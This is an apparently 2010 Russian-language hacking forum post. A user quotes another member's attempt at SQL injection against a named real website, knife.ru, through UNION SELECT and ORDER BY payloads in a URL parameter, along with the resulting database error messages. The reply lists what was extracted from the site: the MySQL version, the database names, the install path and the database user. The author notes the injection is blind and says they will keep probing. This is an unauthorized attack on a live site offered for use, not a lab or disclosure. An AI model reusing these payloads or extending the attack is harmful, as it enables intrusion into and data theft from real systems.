13.04.2010, 00:22
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами:
8603287
Репутация:
87
|
|
Сообщение от S[N]EP
http://www.knife.ru/index.php?1=1&do=list&treeid=1+union+all+select+1 - вот вроде sql inj выводит ошибку
PHP код:
Ошибка запроса: 'select name,parentid from kn_tree where id=1 union all select 1'
а если запрос изменить на:
http://www.knife.ru/index.php?1=1&do=list&treeid=1+union+all+select+1, 2
то ошибка уже
PHP код:
Ошибка запроса: 'select typeid from kn_tree where id=1 union all select 1,2'
что это значит? и как подобрать количество полей.?
кстати вот ещё http://www.knife.ru/index.php?1=1&do=list&treeid=1+order+by+1 терь ошибка вообще другая...
Version: 5.5.2-m2-log
Database: information_schema / knife / knife_forum / knife_phpbb2
Installation dir: /usr/local/
User: knife@localhost
слепая
з.ы щяс порыскаю может ище чтото найду
Последний раз редактировалось [Feldmarschall]; 13.04.2010 в 00:25..
|
|
|